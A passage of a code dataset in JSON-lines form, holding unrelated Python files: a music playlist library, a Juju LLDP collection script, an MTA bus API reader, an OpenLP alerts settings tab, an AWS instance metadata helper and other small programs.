0\n\t\twhile i < len(array):\n\t\t\tif not array[i].isdigit() or int(array[i]) > 59:\n\t\t\t\treturn False\n\t\t\ti += 1\n\t\tif len(array) == 2:\n\t\t\tif int(array[0]) >= 0 and int(array[1]) > 0 and int(array[1]) < 60:\n\t\t\t\treturn True\n\n\t\tif len(array) == 3:\n\t\t\tif int(array[0]) > 0 and int(array[1]) > 0 and int(array[1]) < 60 and int(array[2]) > 0 and int(array[2]) < 60:\n\t\t\t\treturn True\n\n\tdef __str__(self):\n\t\tif self.is_valid_length:\n\t\t\treturn \"{} {} '{}' {}\".format(self.title, self.artist, self.album, self.length)\n\t\traise Exception(\"Invalid length !!!\")\n\n\tdef __repr__(self):\n\t\treturn str(self)\n\n\tdef __eq__(self, other):\n\t\treturn self.title == other.title and self.artist == other.artist and self.album == other.album and self.length == other.length\n\n\tdef __hash__(self):\n\t\treturn hash((self.title, self.artist, self.album, self.length))\n\t\n\tdef get_length(self, seconds = False, minutes = False, hours = False):\n\t\ttime_parts = self.length.split(':')\n\t\tif len(time_parts) == 2:\n\t\t\tlength_in_seconds = int(time_parts[1]) + int(time_parts[0])*60\n\t\t\tlength_in_minutes = int(time_parts[0])\n\t\t\tlength_in_hours = 0\n\t\tif len(time_parts) == 3:\n\t\t\tlength_in_hours = int(time_parts[0])\n\t\t\tlength_in_minutes = int(time_parts[0])*60 + int(time_parts[1])\n\t\t\tlength_in_seconds = int(time_parts[2]) + int(length_in_minutes*60)\n\t\tif seconds:\n\t\t\treturn length_in_seconds\n\t\tif minutes:\n\t\t\treturn length_in_minutes\n\t\tif hours:\n\t\t\treturn length_in_hours\n\t\telse:\n\t\t\treturn(str(self.length))\n\nclass Playlist:\n\n\tdef 
__init__(self, name, repeat=False, shuffle=False):\n\t\tself.name = name\n\t\tself.repeat = repeat\n\t\tself.shuffle = shuffle\n\t\tself.songs = []\n\t\tself.songs_location = {}\n\t\tself.song_ind = 0\n\n\tdef add_song(self, song):\n\t\tif isinstance(song, Song):\n\t\t\tself.songs.append(song)\n\t\treturn self.songs\n\n\tdef remove_song(self, song):\n\t\ti = 0\n\t\twhile self.songs[i] != song:\n\t\t\ti += 1\n\t\tj = i\n\t\twhile j < len(self.songs)-1:\n\t\t\tself.songs[j]=self.songs[j+1]\n\t\t\tj += 1\n\n\t\tself.songs = self.songs[0:len(self.songs)-1]\n\t\treturn self.songs\n\n\tdef total_length(self):\n\t\ttotal = \"\"\n\t\thours = 0\n\t\tminutes = 0\n\t\tseconds = 0\n\t\tfor i in range(0, len(self.songs)):\n\t\t\tcurrent_time_array = self.songs[i].length.split(':')\n\t\t\tif len(current_time_array)==2:\n\t\t\t\tminutes += int(current_time_array[0])\n\t\t\t\tseconds += int(current_time_array[1])\n\t\t\tif len(current_time_array)==3:\n\t\t\t\thours += int(current_time_array[0])\n\t\t\t\tminutes += int(current_time_array[1])\n\t\t\t\tseconds += int(current_time_array[2])\n\t\ts = seconds % 60\n\t\tnew_m = (seconds - s)//60\n\t\tminutes += new_m\n\t\tm = minutes % 60\n\t\tnew_h = (minutes - m)//60\n\t\thours += new_h\n\t\tif hours > 0:\n\t\t\ttotal += str(hours) + \":\"\n\t\ttotal += str(m) + \":\" + str(s)\n\n\t\treturn total\n\n\tdef artists(self):\n\t\tdata = []\n\t\tfor i in range(0, len(self.songs)):\n\t\t\tartist = self.songs[i].artist\n\t\t\tsong = self.songs[i].title\n\t\t\tdata.append((artist, song))\n\t\thist = {}\n\t\tfor i in data:\n\t\t\thist[i] = hist.get(i,0)+1\n\t\tresult_hist = {}\n\t\tfor i in hist:\n\t\t\tresult_hist[i[0]] = hist[(i[0],i[1])]\n\n\t\treturn result_hist\n\n\tdef next_song(self):\n\t\tif self.song_ind == len(self.songs) - 1:\n\t\t\tif self.repeat == True:\n\t\t\t\tself.song_ind = 0\n\n\t\tif self.shuffle == True:\n\t\t\tself.song_ind = random.randint(0, len(self.songs)-1)\n\t\t\t\n\t\treturn self.songs[self.song_ind]\n\n\n\tdef print_playlist(self):\n\t\tprint(\"| \", \"Artist \", \" | \", \" Song \", \" | \", \" Length \", \" |\" )\n\t\tprint(\"|\", \"--------\", \" | \", \"------------------\", \" | \", \"--------\", \" |\" )\n\t\tfor i in range(0,len(self.songs)):\n\t\t\tres = \"| \" + str(self.songs[i].artist)+ \" | \"\n\t\t\ttitle_space = len(\"------------------\")- len(str(self.songs[i].title))\n\t\t\tres += str(self.songs[i].title)\n\t\t\twhile title_space > 0:\n\t\t\t\tres += \" \"\n\t\t\t\ttitle_space -= 1\n\t\t\tres += \" | \"\n\n\t\t\ttitle_space = len(\"-------- \")- len(str(self.songs[i].length))\n\t\t\tres += str(self.songs[i].length)\n\t\t\twhile title_space > 0:\n\t\t\t\tres += \" \"\n\t\t\t\ttitle_space -= 1\n\t\t\tres += \" |\"\n\n\t\t\tprint(res)\n\n\n\tdef save(self):\n\t\td = {\"name\": self.name, \"songs\": []}\n\t\tfor i in range(0, len(self.songs)):\n\t\t\tdata = {}\n\t\t\tdata[\"title\"] = self.songs[i].title\n\t\t\tdata[\"artist\"] = self.songs[i].artist\n\t\t\tdata[\"album\"] = self.songs[i].album\n\t\t\tdata[\"length\"] = self.songs[i].length\n\t\t\td[\"songs\"].append(data)\n\t\t\n\t\tfilename = \"\"\n\t\tfor i in range(0, len(self.name)):\n\t\t\tif self.name[i]==\" \":\n\t\t\t\tfilename += \"-\"\n\t\t\telse:\n\t\t\t\tfilename += self.name[i]\n\t\tfilename += \".json\"\n\t\twith open(filename,'w') as f:\n\t\t\tjson.dump(d,f)\n\t\treturn filename\n\n\t@classmethod\n\tdef load(cls, file_name):\n\t\twith open(file_name, 'r') as f:\n\t\t\tcontent = json.load(f)\n\t\t\tplaylist = Playlist(content[\"name\"])\n\t\t\tfor song in content[\"songs\"]:\n\t\t\t\tnew_song = 
Song(\n\t\t\t\t\tartist=song[\"artist\"], title=song[\"title\"], album=song[\"album\"], length=song[\"length\"])\n\t\t\t\tplaylist.add_song(new_song)\n\t\t\treturn playlist\n\n\tdef add_location(self, song, location):\n\t\tself.songs_location[song] = location\n\n\nclass MusicCrawler:\n\n\tdef __init__(self, path):\n\t\tself.path = path\n\n\tdef get_info(self, data):\n\t\tsong_data = {}\n\t\tsong_data[\"artist\"] = data[\"ARTIST\"].text[0] if \"ARTIST\" in data else \"Unknown\"\n\t\tsong_data[\"album\"] = data[\"ALBUM\"].text[0] if \"ALBUM\" in data else \"Unknown\"\n\t\tsong_data[\"title\"] = data[\"TITLE\"].text[0] if \"TITLE\" in data else \"Unknown\"\n\t\ttry:\n\t\t\tsong_data[\"length\"] = str(\n\t\t\t\tdatetime.timedelta(seconds=data.info.length//1))[2:]\n\t\texcept:\n\t\t\tsong_data[\"length\"] = \"Unknown\"\n\t\treturn song_data\n\n\tdef generate_playlist(self, name):\n\t\tplaylist = Playlist(name)\n\t\tsongs = [mp3 for mp3 in os.listdir(self.path) if mp3.endswith(\".mp3\")]\n\t\tfor song in songs:\n\t\t\tdata = mutagen.File(self.path + \"/\" + song)\n\t\t\tinfo = self.get_info(data)\n\t\t\tnew_song = Song(\n\t\t\t\tartist=info[\"artist\"], title=info[\"title\"], album=info[\"album\"], length=info[\"length\"])\n\t\t\tplaylist.add_song(new_song)\n\t\t\tplaylist.add_location(new_song, self.path + \"/\" + song)\n\t\treturn playlist\n","repo_name":"angelavelinova/Programming-101","sub_path":"week05/03.MusicLibrary/music_library.py","file_name":"music_library.py","file_ext":"py","file_size_in_byte":6131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29240514382","text":"#!/usr/bin/python3\n\nimport json\nimport os\nimport shutil\nimport tempfile\nimport subprocess\nfrom optparse import OptionParser\n\ndef get_model_machines():\n raw = subprocess.check_output('juju machines --format json',shell=True)\n ret = []\n json_machines = json.loads(raw)\n for id in json_machines['machines']:\n name = json_machines['machines'][id]['display-name']\n ret.append( (id,name) )\n return ret\n\ndef write_collector_script(install_lldp = True):\n ftmp, ftmpname = tempfile.mkstemp()\n header = \"#!/bin/bash\\n\"\n install = \"\"\"\n for interface in `ls /sys/kernel/debug/i40e`\n do echo \"lldp stop\" > /sys/kernel/debug/i40e/${interface}/command\n done\n apt install lldpd -y;\n \"\"\"\n collect = \"lldpcli show neighbors details -f json > /tmp/lldp_output.json\\n\"\n body = header\n if install_lldp:\n body += install\n body += \"\\n\"\n body += collect\n os.write(ftmp,body.encode('utf-8'))\n os.close(ftmp)\n return ftmpname\n\ndef copy_script(machine, script_name):\n subprocess.run(\"juju scp {script_name} {machine}:{script_name}\".format(machine = machine, script_name = script_name), shell = True)\n\ndef run_script(machine, script_name):\n subprocess.run(\"juju ssh {machine} \\\"chmod 700 {script_name}; sudo {script_name}; rm {script_name}\\\"\"\n .format(machine = machine, script_name = script_name), shell = True)\n\ndef collect_data(machine_id, hostname, work_dir):\n subprocess.run(\"juju scp {machine_id}:/tmp/lldp_output.json {work_dir}/{hostname}.json\"\n .format(machine_id = machine_id, hostname = hostname, work_dir = work_dir), shell = True)\n\ndef main(options):\n if os.path.isdir(options.work_dir):\n shutil.rmtree(options.work_dir)\n os.mkdir(options.work_dir)\n script_name = write_collector_script(options.install_lldp)\n for machine in get_model_machines():\n id = machine[0]\n hostname = machine[1]\n copy_script(id, script_name)\n run_script(id, script_name)\n collect_data(id, hostname, 
options.work_dir)\n os.remove(script_name)\n\nif __name__ == \"__main__\":\n usage = \"usage: %prog [options] arg1 arg2\"\n parser = OptionParser(usage=usage)\n parser.add_option(\"-d\", \"--dir\",\n action=\"store\", type=\"string\", dest=\"work_dir\", default=\"/tmp/lldp\", help=\"Output directory\")\n parser.add_option(\"-i\", \"--install\",\n action=\"store_true\", dest=\"install_lldp\", default=False, help=\"Install LLDP tools first\") \n (options, args) = parser.parse_args() \n main(options)","repo_name":"majduk/net-surveyor","sub_path":"collect-lldp-juju.py","file_name":"collect-lldp-juju.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"1729943712","text":"'''\nGiven two arrays X and Y of positive integers, find the number of pairs such that x^y > y^x (x raised to the power y, and y raised to the power x), where x is an element from X and y is an element from Y.\n\nInput:\nThe first line of input contains an integer T, denoting the number of test cases. Then T test cases follow. Each test consists of three lines. The first line of each test case consists of two space separated M and N denoting size of arrays X and Y respectively. The second line of each test case contains M space separated integers denoting the elements of array X. The third line of each test case contains N space separated integers denoting elements of array Y.\n\nOutput:\nCorresponding to each test case, print in a new line, the number of pairs such that x^y > y^x.\n\nConstraints:\n1 ≤ T ≤ 100\n1 ≤ M, N ≤ 10^5\n1 ≤ X[i], Y[i] ≤ 10^3\n\nExample:\nInput\n1\n3 2\n2 1 6\n1 5\n\nOutput\n3\n'''\n#DCP11\ndef compare_power(a,b,m,n):\n count = 0\n for i in range(len(a)):\n for j in range(len(b)):\n if pow(a[i],b[j])>pow(b[j],a[i]):\n count += 1\n return count\n\nif __name__ == \"__main__\":\n ans = 0\n ans_list = []\n test_cases = int(input())\n for i in range(test_cases):\n n , m = map(int,input().split())\n a = list(map(int,input().split()))\n b = list(map(int,input().split()))\n ans = compare_power(a,b,m,n)\n ans_list.append(ans)\n for i in range(test_cases): \n print(ans_list[i], end = \" \")\n","repo_name":"Keshav-Asopa/Daily_Coding_Problem","sub_path":"DCP11.py","file_name":"DCP11.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10937614650","text":"# Author: Andrew Nell 2017/09/27 \n# HW2-Assignment 2\n\n###############################################################################\n\n# Code developed to pull information for a specific bus line from the MTA Bus\n# API and output all current vehicles coordinates and next stops and status\n\n###############################################################################\n\n# Imports to run code\nfrom __future__ import print_function\nimport sys\nimport json\n\ntry: \n import urllib2 as urllib\nexcept ImportError:\n import urllib.request as urllib # F. Bianco Reference 1\n\n###############################################################################\n# Import data from API \n\n# Ensure correct number of arguments entered \nif not len(sys.argv) == 4:\n print (\"Invalid number of arguments. Run as: python get_bus_info_adn\"\n \"323.py <key> <bus_line> <output_file>.csv\")\n sys.exit() # F. 
Bianco Reference 2\n\n# Define arguments\nkey, bus_line, outputfile = sys.argv[1], sys.argv[2], sys.argv[3]\n\n# Pull data from API using Key and Bus Line\ntry:\n url = (\"http://bustime.mta.info/api/siri/vehicle-monitoring.json?key=\"\n \"%s&VehicleMonitoringDetailLevel=calls&LineRef=%s\"%(key, bus_line))\n response = urllib.urlopen(url)\n data = response.read().decode(\"utf-8\")\n data = json.loads(data)\nexcept urllib.HTTPError:\n print(\"Invalid key and url. Please try again. Run as: python \" \n \"get_bus_info_adn323.py <key> <bus_line> <output_file>.csv\")\n sys.exit()\n\n###############################################################################\n# Define variables for output including Total Vehicles, Latitudes, longitudes \n# next stops and status for each vehicle and then print variables out and \n# create .csv file and start printing output into .csv\n\n# Define Number of vehicles\ntry:\n NoOfVehicles = (len(data['Siri']['ServiceDelivery']\n ['VehicleMonitoringDelivery'][0]['VehicleActivity']))\nexcept KeyError:\n print(\"Bus line does not exist or input invalid. Run as: \" \n \"python get_bus_info_adn323.py <key> <bus_line> <output_file>\")\n sys.exit()\n\n# create .csv \nfout = open(sys.argv[3], \"w\")\nfout.write(\"Latitude,Longitude,Stop Name,Stop Status\\n\")\n\n# Define latitude, longitude, next stop and status of each bus and print \n# out in .CSV\nfor i in range(NoOfVehicles):\n \n # Define Latitude and Longitude\n \n latitude = (data['Siri']['ServiceDelivery']['VehicleMonitoringDelivery']\n [0]['VehicleActivity'][i]['MonitoredVehicleJourney']\n ['VehicleLocation']['Latitude'])\n \n longitude = (data['Siri']['ServiceDelivery']['VehicleMonitoringDelivery']\n [0]['VehicleActivity'][i]['MonitoredVehicleJourney']\n ['VehicleLocation']['Longitude']) \n \n # Define Next stop and account for errors\n try:\n\n stopname = (data['Siri']['ServiceDelivery']\n ['VehicleMonitoringDelivery'][0]['VehicleActivity'][i]\n ['MonitoredVehicleJourney']['OnwardCalls']['OnwardCall'][0]\n ['StopPointName'])\n except KeyError:\n stopname = \"N/A\"\n \n # Define status and account for errors \n try:\n\n stopstatus = (data['Siri']['ServiceDelivery']\n ['VehicleMonitoringDelivery'][0]['VehicleActivity'][i]\n ['MonitoredVehicleJourney']['OnwardCalls']['OnwardCall']\n [0]['Extensions']['Distances']['PresentableDistance'])\n except KeyError:\n stopstatus = \"N/A\"\n \n # Print outputs in desired format into .csv\n fout.write(str(latitude) + \",\" + str(longitude) + \",\" + str(stopname) + \n \",\" + str(stopstatus) + \"\\n\")\n\n\n\n###############################################################################\n\n# References \n\n# 1\n# F. Bianco, APIreadingJson.py.ipynb, access at: \n# https://github.com/fedhere/PUI2017_fb55/blob/master/Lab2_fb55/APIreadingJso\n# n.py.ipynb on 2017/09/27\n\n# 2 \n# F. 
Bianco, aSimplePythonThatWritesToCSV.py, access at: \n# https://github.com/fedhere/PUI2017_fb55/blob/master/Lab2_fb55/aSimplePython\n# ThatWritesToCSV.py on 2017/09/27 ","repo_name":"andrewnell/PUI2017_adn323","sub_path":"HW2_adn323/get_bus_info_adn323.py","file_name":"get_bus_info_adn323.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15594424211","text":"from PyQt5 import QtGui, QtWidgets\n\nfrom openlp.core.common.i18n import UiStrings, translate\nfrom openlp.core.lib.settingstab import SettingsTab\nfrom openlp.core.lib.ui import create_valign_selection_widgets\nfrom openlp.core.widgets.buttons import ColorButton\n\n\nclass AlertsTab(SettingsTab):\n \"\"\"\n AlertsTab is the alerts settings tab in the settings dialog.\n \"\"\"\n def setup_ui(self):\n self.setObjectName('AlertsTab')\n super(AlertsTab, self).setup_ui()\n self.font_group_box = QtWidgets.QGroupBox(self.left_column)\n self.font_group_box.setObjectName('font_group_box')\n self.font_layout = QtWidgets.QFormLayout(self.font_group_box)\n self.font_layout.setObjectName('font_layout')\n self.font_label = QtWidgets.QLabel(self.font_group_box)\n self.font_label.setObjectName('font_label')\n self.font_combo_box = QtWidgets.QFontComboBox(self.font_group_box)\n self.font_combo_box.setObjectName('font_combo_box')\n self.font_layout.addRow(self.font_label, self.font_combo_box)\n self.font_color_label = QtWidgets.QLabel(self.font_group_box)\n self.font_color_label.setObjectName('font_color_label')\n self.font_color_button = ColorButton(self.font_group_box)\n self.font_color_button.setObjectName('font_color_button')\n self.font_layout.addRow(self.font_color_label, self.font_color_button)\n self.font_size_label = QtWidgets.QLabel(self.font_group_box)\n self.font_size_label.setObjectName('font_size_label')\n self.font_size_spin_box = QtWidgets.QSpinBox(self.font_group_box)\n self.font_size_spin_box.setObjectName('font_size_spin_box')\n self.font_layout.addRow(self.font_size_label, self.font_size_spin_box)\n self.left_layout.addWidget(self.font_group_box)\n # Background Settings\n self.background_group_box = QtWidgets.QGroupBox(self.left_column)\n self.background_group_box.setObjectName('background_group_box')\n self.background_layout = QtWidgets.QFormLayout(self.background_group_box)\n self.background_layout.setObjectName('background_settings_layout')\n self.background_color_label = QtWidgets.QLabel(self.background_group_box)\n self.background_color_label.setObjectName('background_color_label')\n self.background_color_button = ColorButton(self.background_group_box)\n self.background_color_button.setObjectName('background_color_button')\n self.background_layout.addRow(self.background_color_label, self.background_color_button)\n self.left_layout.addWidget(self.background_group_box)\n # Scroll Settings\n self.scroll_group_box = QtWidgets.QGroupBox(self.left_column)\n self.scroll_group_box.setObjectName('scroll_group_box')\n self.scroll_group_layout = QtWidgets.QFormLayout(self.scroll_group_box)\n self.scroll_group_layout.setObjectName('scroll_group_layout')\n self.scroll_check_box = QtWidgets.QCheckBox(self.scroll_group_box)\n self.scroll_check_box.setObjectName('scroll_check_box')\n self.scroll_group_layout.addRow(self.scroll_check_box)\n self.repeat_label = QtWidgets.QLabel(self.scroll_group_box)\n self.repeat_label.setObjectName('repeat_label')\n self.repeat_spin_box = QtWidgets.QSpinBox(self.scroll_group_box)\n 
self.repeat_spin_box.setObjectName('repeat_spin_box')\n self.scroll_group_layout.addRow(self.repeat_label, self.repeat_spin_box)\n self.left_layout.addWidget(self.scroll_group_box)\n # Other Settings\n self.settings_group_box = QtWidgets.QGroupBox(self.left_column)\n self.settings_group_box.setObjectName('settings_group_box')\n self.settings_layout = QtWidgets.QFormLayout(self.settings_group_box)\n self.settings_layout.setObjectName('settings_layout')\n self.timeout_label = QtWidgets.QLabel(self.settings_group_box)\n self.timeout_label.setObjectName('timeout_label')\n self.timeout_spin_box = QtWidgets.QSpinBox(self.settings_group_box)\n self.timeout_spin_box.setMaximum(180)\n self.timeout_spin_box.setObjectName('timeout_spin_box')\n self.settings_layout.addRow(self.timeout_label, self.timeout_spin_box)\n self.vertical_label, self.vertical_combo_box = create_valign_selection_widgets(self.font_group_box)\n self.vertical_label.setObjectName('vertical_label')\n self.vertical_combo_box.setObjectName('vertical_combo_box')\n self.settings_layout.addRow(self.vertical_label, self.vertical_combo_box)\n self.left_layout.addWidget(self.settings_group_box)\n self.left_layout.addStretch()\n self.preview_group_box = QtWidgets.QGroupBox(self.right_column)\n self.preview_group_box.setObjectName('preview_group_box')\n self.preview_layout = QtWidgets.QVBoxLayout(self.preview_group_box)\n self.preview_layout.setObjectName('preview_layout')\n self.font_preview = QtWidgets.QLineEdit(self.preview_group_box)\n self.font_preview.setObjectName('font_preview')\n self.preview_layout.addWidget(self.font_preview)\n self.right_layout.addWidget(self.preview_group_box)\n self.right_layout.addStretch()\n # Signals and slots\n self.background_color_button.colorChanged.connect(self.on_background_color_changed)\n self.font_color_button.colorChanged.connect(self.on_font_color_changed)\n self.font_combo_box.activated.connect(self.on_font_combo_box_clicked)\n self.timeout_spin_box.valueChanged.connect(self.on_timeout_spin_box_changed)\n self.font_size_spin_box.valueChanged.connect(self.on_font_size_spin_box_changed)\n self.repeat_spin_box.valueChanged.connect(self.on_repeat_spin_box_changed)\n self.scroll_check_box.toggled.connect(self.scroll_check_box_toggled)\n\n def retranslate_ui(self):\n self.font_group_box.setTitle(translate('AlertsPlugin.AlertsTab', 'Font Settings'))\n self.font_label.setText(translate('AlertsPlugin.AlertsTab', 'Font name:'))\n self.font_color_label.setText(translate('AlertsPlugin.AlertsTab', 'Font color:'))\n self.background_color_label.setText(UiStrings().BackgroundColorColon)\n self.font_size_label.setText(translate('AlertsPlugin.AlertsTab', 'Font size:'))\n self.font_size_spin_box.setSuffix(' {unit}'.format(unit=UiStrings().FontSizePtUnit))\n self.background_group_box.setTitle(translate('AlertsPlugin.AlertsTab', 'Background Settings'))\n self.settings_group_box.setTitle(translate('AlertsPlugin.AlertsTab', 'Other Settings'))\n self.timeout_label.setText(translate('AlertsPlugin.AlertsTab', 'Alert timeout:'))\n self.timeout_spin_box.setSuffix(' {unit}'.format(unit=UiStrings().Seconds))\n self.repeat_label.setText(translate('AlertsPlugin.AlertsTab', 'Repeat (no. 
of times):'))\n self.scroll_check_box.setText(translate('AlertsPlugin.AlertsTab', 'Enable Scrolling'))\n self.preview_group_box.setTitle(UiStrings().Preview)\n self.font_preview.setText(UiStrings().OpenLP)\n\n def on_background_color_changed(self, color):\n \"\"\"\n The background color has been changed.\n \"\"\"\n self.background_color = color\n self.update_display()\n\n def on_font_combo_box_clicked(self):\n \"\"\"\n The Font Combo was changed.\n \"\"\"\n self.update_display()\n\n def on_font_color_changed(self, color):\n \"\"\"\n The Font Color button has clicked.\n \"\"\"\n self.font_color = color\n self.update_display()\n\n def on_timeout_spin_box_changed(self):\n \"\"\"\n The Time out spin box has changed.\n\n \"\"\"\n self.timeout = self.timeout_spin_box.value()\n self.changed = True\n\n def on_font_size_spin_box_changed(self):\n \"\"\"\n The font size spin box has changed.\n \"\"\"\n self.font_size = self.font_size_spin_box.value()\n self.update_display()\n\n def on_repeat_spin_box_changed(self):\n \"\"\"\n The repeat spin box has changed\n \"\"\"\n self.repeat = self.repeat_spin_box.value()\n self.changed = True\n\n def scroll_check_box_toggled(self):\n \"\"\"\n The scrolling checkbox has been toggled\n \"\"\"\n if self.scroll_check_box.isChecked():\n self.repeat_spin_box.setEnabled(True)\n else:\n self.repeat_spin_box.setEnabled(False)\n self.scroll = self.scroll_check_box.isChecked()\n self.changed = True\n\n def load(self):\n \"\"\"\n Load the settings into the UI.\n \"\"\"\n self.settings.beginGroup(self.settings_section)\n self.timeout = self.settings.value('timeout')\n self.font_color = self.settings.value('font color')\n self.font_size = self.settings.value('font size')\n self.background_color = self.settings.value('background color')\n self.font_face = self.settings.value('font face')\n self.location = self.settings.value('location')\n self.repeat = self.settings.value('repeat')\n self.scroll = self.settings.value('scroll')\n self.settings.endGroup()\n self.font_size_spin_box.setValue(self.font_size)\n self.timeout_spin_box.setValue(self.timeout)\n self.font_color_button.color = self.font_color\n self.background_color_button.color = self.background_color\n self.repeat_spin_box.setValue(self.repeat)\n self.repeat_spin_box.setEnabled(self.scroll)\n self.vertical_combo_box.setCurrentIndex(self.location)\n self.scroll_check_box.setChecked(self.scroll)\n font = QtGui.QFont()\n font.setFamily(self.font_face)\n self.font_combo_box.setCurrentFont(font)\n self.update_display()\n self.changed = False\n\n def save(self):\n \"\"\"\n Save the changes on exit of the Settings dialog.\n \"\"\"\n self.settings.beginGroup(self.settings_section)\n # Check value has changed as no event handles this field\n if self.settings.value('location') != self.vertical_combo_box.currentIndex():\n self.changed = True\n self.settings.setValue('background color', self.background_color)\n self.settings.setValue('font color', self.font_color)\n self.settings.setValue('font size', self.font_size)\n self.font_face = self.font_combo_box.currentFont().family()\n self.settings.setValue('font face', self.font_face)\n self.settings.setValue('timeout', self.timeout)\n self.location = self.vertical_combo_box.currentIndex()\n self.settings.setValue('location', self.location)\n self.settings.setValue('repeat', self.repeat)\n self.settings.setValue('scroll', self.scroll_check_box.isChecked())\n self.settings.endGroup()\n if self.changed:\n self.settings_form.register_post_process('update_display_css')\n self.changed = 
False\n\n def update_display(self):\n \"\"\"\n Update the preview display after changes have been made.\n \"\"\"\n font = QtGui.QFont()\n font.setFamily(self.font_combo_box.currentFont().family())\n font.setBold(True)\n font.setPointSize(self.font_size)\n self.font_preview.setFont(font)\n self.font_preview.setStyleSheet('background-color: {back}; color: {front}'.format(back=self.background_color,\n front=self.font_color))\n self.changed = True\n","repo_name":"ipic/projecao","sub_path":"openlp/plugins/alerts/lib/alertstab.py","file_name":"alertstab.py","file_ext":"py","file_size_in_byte":11457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28264453301","text":"import sys\nimport requests\n\n\ndef _help_():\n meta_data = {\n 'all': 'Provides all the details of your instance',\n 'accountId': 'Provides Account Id of your instance',\n 'architecture': 'Provides architecture of your instance',\n 'availabilityZone': 'Provides Availability Zone of your instance',\n 'billingProducts': \"Provides Billing Products of your instance\",\n 'devpayProductCodes': \"Provides payable products of your instance\",\n 'marketplaceProductCodes': \"Provides Marketplace details of your instance\",\n 'imageId': \"Provides AMI number/Id of your instance\",\n 'instanceId': 'Provides instance Id of your instance',\n 'instanceType': 'Provides instance type', 'kernelId': \"Provides kernelId of your instance\",\n 'pendingTime': 'Provides pending time of your instance',\n 'privateIp': 'Provides Private IP of your instance',\n 'ramdiskId': \"Provides RAM disk Id of your instance\", 'region': 'Provides region of your instance',\n 'version': 'Provides version of your instance'\n }\n print(\"Use any option provided below as a flag to run the script\")\n for key, value in meta_data.items():\n print(\"Option: {} ({})\".format(key, value))\n\n\ndef get_meta_data(key=\"all\"):\n url = \"http://169.254.169.254/latest/dynamic/instance-identity/document\"\n response = requests.get(url)\n if response.status_code == 200:\n response = response.json()\n if key == \"all\":\n return response\n else:\n if key in response:\n return response[key]\n else:\n return \"Please check the key provided \\nUse help for more options\\n \" \\\n \"if no key is provided all is considered by default\"\n else:\n return \"Please try again after sometime\"\n\n\nflag = sys.argv[-1]\n\n\nif flag == \"help\":\n _help_()\nelse:\n if flag != \"challenge2.py\":\n print(get_meta_data(flag))\n else:\n print(get_meta_data())\n","repo_name":"AkshayArni003/Interview","sub_path":"coding/challenge2.py","file_name":"challenge2.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74378122793","text":"# Download an image with the requests library\nimport unittest\nimport requests\nimport io\nimport matplotlib.pyplot as plt\n\n\nclass SimpleImageDownloaderTest(unittest.TestCase):\n def test_download_image(self):\n resp = requests.get('https://www.baidu.com/img/PCtm_d9c8750bed0b3c7d089fa7d55720d6cf.png') # URL of the target image\n with open('D:/python/venv/onlinelearning/a.jpg', 'wb') as f: # open the local file with a with statement; if the path is omitted, the current directory is used\n f.write(resp.content) # write the binary data to the file\n\n # read this image's content as a stream with the PIL library\n from PIL import Image\n img = Image.open('D:/python/venv/onlinelearning/a.jpg')\n print(img)\n\n # display the image with matplotlib's matplotlib.pyplot.imshow function\n plt.subplot(221);\n plt.imshow(img)\n plt.show()\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"yzxty/learngit","sub_path":"python/py6_1.py","file_name":"py6_1.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38428400406","text":"import unittest\n\nfrom faker import Faker\n\nfrom .model_test import ModelTest\nfrom random import randrange\n\nclass TestLottery(ModelTest):\n\n\n faker = Faker()\n\n @classmethod\n def setUpClass(cls):\n super(TestLottery, cls).setUpClass()\n\n from mib.models import lottery\n cls.lottery = lottery\n\n @staticmethod\n def assertLotteryEquals(value, expected):\n t = unittest.FunctionTestCase(TestLottery)\n t.assertEqual(value.id, expected.id)\n t.assertEqual(value.ticket_number, expected.ticket_number)\n t.assertEqual(value.points, expected.points)\n \n @staticmethod\n def generate_random_lottery_row():\n id = randrange(100000)\n ticket_number = randrange(100)\n points = 0\n\n from mib.models import Lottery\n\n lottery = Lottery(\n id = id,\n ticket_number = ticket_number,\n points = points\n )\n\n return lottery\n\n def test_set_ticket_number(self):\n row = TestLottery.generate_random_lottery_row()\n row.set_ticket_number(15)\n\n self.assertEqual(\n row.ticket_number,\n 15\n )\n def test_unset_ticket_number(self):\n row = TestLottery.generate_random_lottery_row()\n row.unset_ticket_number()\n self.assertEqual(\n row.ticket_number,\n -1\n )\n def test_add_points(self):\n row = TestLottery.generate_random_lottery_row()\n points = row.points\n row.add_points(5)\n self.assertEqual(row.points, points+5)\n\n def test_set_points(self):\n row = TestLottery.generate_random_lottery_row()\n row.set_points(5)\n self.assertEqual(row.points,5)\n","repo_name":"lcnz/mib-lottery","sub_path":"tests/models/test_lottery.py","file_name":"test_lottery.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70444247592","text":"from typing import Optional\nimport json\nimport asyncio\n\nimport websockets\nimport agorartc\nfrom fastapi import FastAPI, Query, Form, Request, status, BackgroundTasks\nfrom fastapi.responses import RedirectResponse, HTMLResponse\nfrom fastapi.templating import Jinja2Templates\nfrom pydantic import BaseModel\nfrom gtts import gTTS\nfrom clubhouse.clubhouse import Clubhouse\n\nfrom donatehouse import da\nfrom donatehouse import settings\nfrom donatehouse import utils\n\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory='donatehouse/templates')\n\n\nclass ClubhouseConfig(BaseModel):\n user_id: Optional[str]\n user_token: Optional[str]\n user_device: Optional[str]\n channel_id: Optional[str]\n language: Optional[str]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n clubhouse_config = utils.read_ch_config()\n self.user_id = 